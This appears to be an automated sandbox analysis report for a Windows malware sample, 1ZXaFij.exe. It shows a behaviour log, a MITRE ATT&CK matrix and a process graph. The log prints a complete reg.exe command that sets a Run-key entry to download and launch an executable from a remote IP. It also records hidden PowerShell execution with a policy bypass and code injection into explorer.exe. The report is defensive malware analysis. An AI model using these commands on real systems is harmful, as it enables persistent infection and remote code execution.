        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400D5288 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00000001400D5288
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400DEBE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00000001400DEBE0

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe Network Connect: 45.144.212.77 16000
        Source: C:\Windows\explorer.exe Network Connect: 208.95.112.1 80
        Source: C:\Windows\explorer.exe Network Connect: 108.128.124.3 443
        Source: C:\Windows\explorer.exe Network Connect: 204.79.197.203 443
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vk4yczyv.0.cs
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 10AE0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 111A0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 4056 base: 10AE0000 value: E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 4056 base: 111A0000 value: E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10AE0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 111A0000
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW, 2_2_0000000140063EB0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014001FA50 GetCurrentThreadId,MapVirtualKeyW,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,keybd_event,keybd_event, 2_2_000000014001FA50
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400207C0 GetSystemMetrics,mouse_event,mouse_event, 2_2_00000001400207C0
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"
        Source: C:\Users\user\Desktop\1ZXaFij.exe Process created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /f
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe Process created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /f
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: msctls_statusbar321No StatusBar.Press OK to continue.IsHungAppWindowahk_idpidProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: 1ZXaFij.exe Binary or memory string: Program Manager
        Source: 1ZXaFij.exe, explorer.exe, 00000017.00000000.1484230465.0000000004880000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: 1ZXaFij.exe, 00000002.00000002.1374784666.00000000007FA000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ProgmanA
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: ahk_groupTarget window not found.PosTarget control not found.%uCountSelectedFocusedind+-^HwndShell_TrayWndRtlGetVersionntdll.dll%u.%u.%u%s: %s...%s[%Iu of %Iu]: %-1.60s%sMinHide<object>AltTabShiftAltTabAltTabMenuAltTabAndMenuAltTabMenuDismissAbsACosASinATanCaretGetPosCeilChrComCallComObjActiveComObjConnectComObjFlagsComObjFromPtrComObjGetComObjQueryComObjTypeComObjValueCosDllCallExpFileOpenFloorFormatFormatTimeGetMethodHasBaseHasMethodHasPropInStrIsAlnumIsAlphaIsDigitIsFloatIsIntegerIsLowerIsNumberIsObjectIsSetRefIsSpaceIsTimeIsUpperIsXDigitLnLogLTrimModNumGetNumPutObjAddRefObjBindMethodObjFromPtrObjFromPtrAddRefObjGetBaseObjGetCapacityObjHasOwnPropObjOwnPropCountObjOwnPropsObjPtrObjPtrAddRefObjReleaseObjSetBaseObjSetCapacityOrdRegCreateKeyRegDeleteRegDeleteKeyRegExMatchRegExReplaceRegReadRegWriteRoundRTrimRunWaitSinSoundGetInterfaceSoundGetMuteSoundGetNameSoundGetVolumeSoundSetMuteSoundSetVolumeSplitPathSqrtStrCompareStrGetStrLenStrLowerStrPtrStrPutStrReplaceStrTitleStrUpperSubStrTanTrimTypeVarSetStrCapacityVerCompareWinActiveWinExistAhkPathAhkVersionAllowMainWindowAppDataAppDataCommonClipboardComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultMouseSpeedDesktopDesktopCommonEndCharEventInfoHotkeyIntervalHotkeyModifierTimeoutHourIconFileIconHiddenIconNumberIconTipIndexInitialWorkingDirIs64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileNameLoopFilePathLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegTimeModifiedLoopRegTypeMaxHotkeysPerIntervalMDayMenuMaskKeyMMMonMouseDelayMouseDelayPlayMyDocumentsNowNowUTCOSVersionPriorHotkeyPriorKeyProgramFilesProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapsLockModeThisFuncThisHotkeyTickCountTimeIdleTimeIdleKeyboardTimeIdleMouseTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedTrayMenuUserNameWinDelayWinDirWorkingDirYearYYYY.ahk - %sRegClassCreateWindowConsolasHICON:"%s"notepad.exeCould not open script./include "%s" /restart /script "%s"Script file not found.%s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003AFF0 GetTickCount,GetLocalTime,2_2_000000014003AFF0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003D400 GetComputerNameW,GetUserNameW,2_2_000000014003D400
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400011A0 GetModuleHandleW,GetProcAddress,GetVersionExW,2_2_00000001400011A0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140045A80 UnhookWindowsHookEx,UnregisterHotKey,Shell_NotifyIconW,RemoveClipboardFormatListener,OleFlushClipboard,DestroyWindow,DeleteObject,DestroyIcon,DestroyIcon,RemoveMenu,DestroyMenu,DeleteObject,IsWindow,DestroyWindow,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,2_2_0000000140045A80
MITRE ATT&CK Matrix (one ATT&CK tactic per column; a number in front of a technique is the count shown next to it in the report):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 21 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 11 Input Capture | 11 System Time Discovery | Remote Services | 1 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 221 Registry Run Keys / Startup Folder | 1 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 11 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 36 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 512 Process Injection | 11 Masquerading | LSA Secrets | 371 Security Software Discovery | SSH | Keylogging | 25 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 221 Registry Run Keys / Startup Folder | 1 Valid Accounts | Cached Domain Credentials | 251 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 251 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 512 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 1627183, Sample: 1ZXaFij.exe, Start date: 01/03/2025, Architecture: WINDOWS, Score: 100. Graph node numbers are given in brackets.

[2] Start
  DNS/IP: ip-api.com; discord.com; 6 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 7 other signatures
  Started: 1ZXaFij.exe [11]; runps.exe [16]; explorer.exe [18]; 4 other processes [20]

[11] 1ZXaFij.exe
  DNS/IP: 45.144.212.77, 16000, 49700 (HPC-MVM-ASHU, Ukraine); discord.com 162.159.138.232 (CLOUDFLARENETUS, United States)
  Dropped: C:\Users\user\AppData\Roaming\...\runps.exe (PE32+); C:\Users\user\AppData\Roaming\installer.ps1 (Unicode); C:\Users\user\...\runps.exe:Zone.Identifier (ASCII)
  Signatures: Uses cmd line tools excessively to alter registry or file data; Found API chain indicative of sandbox detection; Drops PE files to the startup folder
  Started: cmd.exe [22]; reg.exe [25]

[16] runps.exe
  Signatures: Sample or dropped binary is a compiled AutoHotkey binary
  Started: cmd.exe [27]; reg.exe [29]

[18] explorer.exe
  Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)

[20] 4 other processes
  DNS/IP: a-0003.a-msedge.net 204.79.197.203, 443 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 127.0.0.1 (unknown)
  Started: WerFault.exe [31]; WerFault.exe [33]; WerFault.exe [35]

[22] cmd.exe
  Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
  Started: powershell.exe [37]; conhost.exe [41]

[25] reg.exe
  Signatures: Creates autostart registry keys with suspicious values (likely registry only malware)
  Started: conhost.exe [43]

[27] cmd.exe
  Started: powershell.exe [45]; conhost.exe [47]

[29] reg.exe
  Started: conhost.exe [49]

[37] powershell.exe
  Dropped: C:\Users\user\AppData\...\5trl00oq.cmdline (Unicode)
  Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Compiles code for process injection (via .Net compiler)
  Injected: explorer.exe [51]
  Started: csc.exe [55]

[45] powershell.exe
  Dropped: C:\Users\user\AppData\Local\...\vk4yczyv.0.cs (Unicode)
  Signatures: Creates a thread in another existing process (thread injection)
  Started: csc.exe [58]

[51] explorer.exe (injected)
  DNS/IP: ip-api.com 208.95.112.1 (TUT-ASUS, United States); checkip.eu-west-1.prod.check-ip.aws.a2z.com 108.128.124.3 (AMAZON-02US, United States)
  Signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found
  Started: powershell.exe [60]; powershell.exe [62]

[55] csc.exe
  Dropped: C:\Users\user\AppData\Local\...\5trl00oq.dll (PE32)
  Started: cvtres.exe [64]

[58] csc.exe
  Dropped: C:\Users\user\AppData\Local\...\vk4yczyv.dll (PE32)
  Started: cvtres.exe [66]

[60] powershell.exe
  Started: conhost.exe [68]

[62] powershell.exe
  Started: conhost.exe [70]
